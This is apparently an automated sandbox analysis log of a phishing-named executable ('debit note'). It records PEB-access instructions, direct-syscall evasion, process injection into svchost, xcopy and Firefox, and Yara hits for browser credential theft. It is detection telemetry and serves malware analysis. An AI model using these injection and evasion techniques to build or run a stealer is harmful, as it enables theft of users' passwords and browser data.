Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]	1_2_03643740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]	1_2_03643740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]	1_2_03643740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]	1_2_03630750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]	1_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]	1_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03703749 mov eax, dword ptr fs:[00000030h]	1_2_03703749
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]	1_2_036B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF72E mov eax, dword ptr fs:[00000030h]	1_2_036EF72E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03633720 mov eax, dword ptr fs:[00000030h]	1_2_03633720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]	1_2_0364F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]	1_2_0364F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]	1_2_0364F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F972B mov eax, dword ptr fs:[00000030h]	1_2_036F972B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]	1_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]	1_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]	1_2_0370B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]	1_2_0370B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]	1_2_0370B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]	1_2_0370B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629730 mov eax, dword ptr fs:[00000030h]	1_2_03629730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629730 mov eax, dword ptr fs:[00000030h]	1_2_03629730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03665734 mov eax, dword ptr fs:[00000030h]	1_2_03665734
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363973A mov eax, dword ptr fs:[00000030h]	1_2_0363973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363973A mov eax, dword ptr fs:[00000030h]	1_2_0363973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]	1_2_036AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637703 mov eax, dword ptr fs:[00000030h]	1_2_03637703
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03635702 mov eax, dword ptr fs:[00000030h]	1_2_03635702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03635702 mov eax, dword ptr fs:[00000030h]	1_2_03635702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]	1_2_0366C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]	1_2_03630710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]	1_2_03660710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366F71F mov eax, dword ptr fs:[00000030h]	1_2_0366F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366F71F mov eax, dword ptr fs:[00000030h]	1_2_0366F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]	1_2_0363D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]	1_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]	1_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]	1_2_036357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]	1_2_036357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]	1_2_036357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]	1_2_036B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B97A9 mov eax, dword ptr fs:[00000030h]	1_2_036B97A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BF7AF mov eax, dword ptr fs:[00000030h]	1_2_036BF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037037B6 mov eax, dword ptr fs:[00000030h]	1_2_037037B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]	1_2_036307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D7B0 mov eax, dword ptr fs:[00000030h]	1_2_0365D7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F7BA mov eax, dword ptr fs:[00000030h]	1_2_0362F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF78A mov eax, dword ptr fs:[00000030h]	1_2_036EF78A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]	1_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]	1_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]	1_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]	1_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03669660 mov eax, dword ptr fs:[00000030h]	1_2_03669660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03669660 mov eax, dword ptr fs:[00000030h]	1_2_03669660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]	1_2_03662674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]	1_2_0364C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]	1_2_0364E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]	1_2_0362F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]	1_2_03666620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705636 mov eax, dword ptr fs:[00000030h]	1_2_03705636
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]	1_2_03668620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]	1_2_0363262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03661607 mov eax, dword ptr fs:[00000030h]	1_2_03661607
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]	1_2_036AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366F603 mov eax, dword ptr fs:[00000030h]	1_2_0366F603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]	1_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03633616 mov eax, dword ptr fs:[00000030h]	1_2_03633616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03633616 mov eax, dword ptr fs:[00000030h]	1_2_03633616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]	1_2_03672619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]	1_2_036C36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D6E0 mov eax, dword ptr fs:[00000030h]	1_2_0365D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D6E0 mov eax, dword ptr fs:[00000030h]	1_2_0365D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]	1_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]	1_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036ED6F0 mov eax, dword ptr fs:[00000030h]	1_2_036ED6F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]	1_2_0363B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]	1_2_0363B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]	1_2_0363B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]	1_2_0363B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]	1_2_0363B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]	1_2_0363B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F16CC mov eax, dword ptr fs:[00000030h]	1_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F16CC mov eax, dword ptr fs:[00000030h]	1_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F16CC mov eax, dword ptr fs:[00000030h]	1_2_036F16CC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\xcopy.exe

Thread register set: target process: 5216

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\xcopy.exe

Thread APC queued: target process: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Writes to foreign memory regions

Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: A42008

Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"	Jump to behavior
Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe	Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PMZSowQBcVJqD.exe, 00000005.00000002.4096104712.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000000.1982209128.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2134363496.00000000017D1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: PMZSowQBcVJqD.exe, 00000005.00000002.4096104712.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000000.1982209128.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2134363496.00000000017D1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: PMZSowQBcVJqD.exe, 00000005.00000002.4096104712.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000000.1982209128.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2134363496.00000000017D1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: PMZSowQBcVJqD.exe, 00000005.00000002.4096104712.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000000.1982209128.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2134363496.00000000017D1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
